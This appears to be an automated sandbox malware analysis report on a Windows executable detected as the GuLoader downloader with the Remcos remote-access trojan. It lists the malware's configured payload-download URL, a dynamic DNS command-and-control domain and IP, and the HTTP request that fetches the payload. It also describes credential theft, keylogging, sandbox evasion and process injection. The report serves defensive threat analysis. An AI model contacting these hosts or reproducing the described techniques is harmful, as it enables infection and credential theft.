Windows Analysis Report loKmeabs9V.exe

Overview

General Information

Sample Name: loKmeabs9V.exe
Analysis ID: 457916
MD5: e0d74762f123eb6603898d1482eb9752
SHA1: ee63af5c34a027ba8b8331dd678b15e7a87d26a6
SHA256: f06e4c96e86c0f36c82d38de0627c0b81995656c4dcbc136c0fedda868ed8ea0
Tags: exe, RAT

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loKmeabs9V.exe (PID: 1536 cmdline: 'C:\Users\user\Desktop\loKmeabs9V.exe' MD5: E0D74762F123EB6603898D1482EB9752)
    • loKmeabs9V.exe (PID: 476 cmdline: 'C:\Users\user\Desktop\loKmeabs9V.exe' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 3576 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 484 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 4112 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny' MD5: E0D74762F123EB6603898D1482EB9752)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe | Virustotal: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe | ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: loKmeabs9V.exe | Virustotal: Detection: 20%
Source: loKmeabs9V.exe | ReversingLabs: Detection: 13%
Yara detected Remcos RAT
Source: Yara match | File source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: loKmeabs9V.exe | Joe Sandbox ML: detected
Source: 22.0.loKmeabs9V.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,
Source: loKmeabs9V.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
Uses dynamic DNS services
Source: unknown | DNS query: name: wealthyrem.ddns.net
Source: global traffic | TCP traffic: 192.168.2.3:49735 -> 194.5.97.128:39200
Source: Joe Sandbox View | ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View | ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: global traffic | HTTP traffic detected:
  GET /WEALTH_PRUuqVZw139.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: 101.99.94.119
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: loKmeabs9V.exe, 00000016.00000003.470302046.0000000000A0D000.00000004.00000001.sdmp | String found in binary or memory: ersion":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version informati equals www.facebook.com (Facebook)
Source: loKmeabs9V.exe, 00000016.00000002.473429817.0000000000B3B000.00000004.00000040.sdmp | String found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.facebook.com (Facebook)
Source: loKmeabs9V.exe, 00000016.00000002.473429817.0000000000B3B000.00000004.00000040.sdmp | String found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.yahoo.com (Yahoo)
Source: loKmeabs9V.exe | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: loKmeabs9V.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: loKmeabs9V.exe, 00000016.00000003.472054856.0000000000B3A000.00000004.00000001.sdmp | String found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.facebook.com (Facebook)
Source: loKmeabs9V.exe, 00000016.00000003.472054856.0000000000B3A000.00000004.00000001.sdmp | String found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.yahoo.com (Yahoo)
Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: wealthyrem.ddns.net
Source: loKmeabs9V.exe, 00000016.00000003.470222066.0000000000A02000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: loKmeabs9V.exe | String found in binary or memory: http://www.ebuddy.com
Source: loKmeabs9V.exe | String found in binary or memory: http://www.imvu.com
Source: loKmeabs9V.exe, 00000017.00000002.470384906.000000000019C000.00000004.00000001.sdmp | String found in binary or memory: http://www.imvu.com/.exe
Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.imvu.comr
Source: loKmeabs9V.exe, 00000016.00000002.472368637.0000000000193000.00000004.00000001.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: loKmeabs9V.exe, loKmeabs9V.exe, 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: loKmeabs9V.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: loKmeabs9V.exe | String found in binary or memory: https://www.google.com
Source: loKmeabs9V.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmp | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\loKmeabs9V.exe
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match | File source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B629C NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B5971 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B9189 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B4230 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B7C19 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B5844 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B9653 NtWriteVirtualMemory,CreateProcessInternalW,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B46C8 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B4CD0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B9122 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B4352 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B41B6 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B4B96 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B87E3 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_2_00569CF6 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_2_00569DCF LdrInitializeThunk,Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_2_00569CF1 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00401806 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_004018C0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_00402CAC NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_00402D66 NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_004016FC NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_004017B6 NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B962D
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B245A
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B8687
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B629C
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B5971
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B0571
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B0BC7
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B3A2E
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B8030
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B4230
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B7C19
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B084F
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B5844
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B9653
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B1654
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B0CAC
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B30BC
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B2889
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B8098
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B3C9E
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B149C
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B2C93
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B8294
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B3EE1
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B10E0
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B46C8
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B36C3
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B82DC
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B4CD0
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B8923
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B7921
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B8324
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B151C
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B1940
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B1D5A
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B4352
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B5DAE
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B41B6
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B4B96
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B87E3
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B41E6
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B5BF3
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 0_2_022B19F4
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1E99D1E7
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1EA3B487
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1E79FBBE
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1E80D21E
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1E8491EC
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1E7AE755
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1E7DBB8C
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1E81BDB5
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 14_3_1E7A064D
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0044B040
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0043610D
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00447310
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0044A490
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0040755A
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0043C560
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0044B610
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0044D6C0
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_004476F0
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0044B870
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0044081D
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00414957
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_004079EE
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00407AEB
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0044AA80
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00412AA9
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00404B74
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00404B03
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_0044BBD8
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00404BE5
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00404C76
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00415CFE
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00416D72
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00446D30
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00446D8B
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_2_00406E8F
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 22_1_00476347
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_004050C2
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_004014AB
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_00405133
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_004051A4
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_00401246
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_0040CA46
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_00405235
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_004032C8
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_004222D9
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_00401689
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_2_00402F60
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 23_1_004222D9
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_0040D044
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_00405038
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_004050A9
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_0040511A
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_004051AB
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_004382F3
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_00430575
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_0043B671
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_0041F6CD
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_004119CF
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_00439B11
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_00438E54
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_00412F67
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_2_0043CF18
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: 24_1_0045530B
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: String function: 00412968 appears 78 times
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: String function: 00421A32 appears 43 times
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: String function: 00416760 appears 69 times
Source: C:\Users\user\Desktop\loKmeabs9V.exe | Code function: String function: 0044407A appears 37 times
Source: loKmeabs9V.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: loKmeabs9V.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yourphone.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yourphone.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: loKmeabs9V.exe, 00000000.00000000.205287548.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilename vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000003.473704439.000000001E84B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000000.334706774.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000002.1292980091.000000001DEA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFileName vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000016.00000000.466532006.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilename vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000017.00000000.468896528.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000018.00000000.470164942.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
